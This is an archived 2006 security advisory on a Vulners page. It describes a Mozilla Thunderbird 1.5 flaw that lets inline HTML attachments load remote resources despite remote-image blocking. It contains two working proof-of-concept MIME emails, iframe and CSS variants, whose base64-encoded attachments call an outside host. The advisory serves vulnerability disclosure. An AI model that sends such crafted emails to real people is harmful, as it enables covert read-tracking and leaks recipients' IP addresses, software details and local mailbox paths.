Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

moz-15.txt

🗓️ 02 Mar 2006 00:00:00Reported by crashfrType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Mozilla Thunderbird Vulnerability in HTML Rendering Engin

Code
`Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities  
  
  
//----- Advisory  
  
  
Program : Mozilla Thunderbird  
Homepage : http://www.mozilla.com/thunderbird/  
Tested version : 1.5  
Found by : crashfr at sysdream dot com  
This advisory : crashfr at sysdream dot com  
Discovery date : 2006/02/18  
  
  
//----- Application description  
  
  
Full-Featured Email  
  
Simple to use, powerful, and customizable, Thunderbird is a full-featured  
email application. Thunderbird supports IMAP and POP mail protocols, as well  
as HTML mail formatting. Easily import your existing email accounts and  
messages. Built-in RSS capabilities, powerful quick search, spell check  
as you  
type, global inbox, deleting attachments and advanced message filtering  
round  
out Thunderbird's modern feature set.  
  
  
//----- Description of vulnerability  
  
  
Thunderbird's HTML rendering engine insufficiently filters the loading  
of external resources from inline HTML attachments. External files are  
downloaded even if the "Block loading of remote images in mail messages"  
option is enabled.  
  
  
//----- Proof Of Concept  
  
  
* Iframe Exploit :  
  
  
Subject: Thunploit by CrashFr !  
From: CrashFr<[email protected]>  
To: CrashFr<[email protected]>  
Content-Type: multipart/related; type="multipart/alternative";  
boundary="----=_NextPart_000_0000_DE61E470.78F38016"  
  
This is a multi-part message in MIME format.  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: multipart/alternative;  
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/plain; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
  
Test by CrashFr  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/html; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
<html><head>  
</head><body style="margin: 0px; padding: 0px; border: 0px;">  
<iframe src="cid:[email protected]" width="100%"  
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>  
</body></html>  
  
------=_NextPart_001_0001_06199DF9.5C825A99--  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: text/html; name="basic.html"  
Content-Transfer-Encoding: base64  
Content-ID: <[email protected]>  
  
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4  
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk  
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg  
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==  
  
------=_NextPart_000_0000_DE61E470.78F38016--  
  
  
* CSS Exploit :  
  
  
Subject: Thunploit by CrashFr !  
From: CrashFr<[email protected]>  
To: CrashFr<[email protected]>  
Content-Type: multipart/related; type="multipart/alternative";  
boundary="----=_NextPart_000_0000_DE61E470.78F38016"  
  
This is a multi-part message in MIME format.  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: multipart/alternative;  
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/plain; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
  
Test by CrashFr  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/html; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
<html><head>  
<link rel="stylesheet" type="text/css"  
href="cid:[email protected]" /></head><body>  
</body></html>  
  
------=_NextPart_001_0001_06199DF9.5C825A99--  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: text/css; name="basic.css"  
Content-Transfer-Encoding: base64  
Content-ID: <[email protected]>  
  
QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj  
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==  
  
------=_NextPart_000_0000_DE61E470.78F38016--  
  
  
  
//----- Impact  
  
  
Successful exploitation may lead to information disclosure (user agent:  
application version & platform, IP address...). A spammer can easily  
check if an email is read. Moreover, an HTML reply to those types of  
emails will contain the complete url path to the mailbox  
(ie: mailbox:///C%7C/Documents%20and%20Settings/CrashFr/  
Application%20Data/Thunderbird/Profiles/7jko3in9.default/  
Mail/Local%20Folders/Inbox?number=2194930&header=quotebody&part=1.2&filename=basic.css").  
  
  
//----- Solution  
  
  
No known solution. You have to wait for a vendor upgrade.  
  
  
//----- Credits  
  
  
http://www.sysdream.com  
crashfr at sysdream dot com  
  
  
//----- Greetings  
  
  
nono2357 & the hackademy ...  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Mar 2006 00:00Current
7.4High risk
Vulners AI Score7.4
mozilla thunderbirdinformation disclosurehtml rendering
21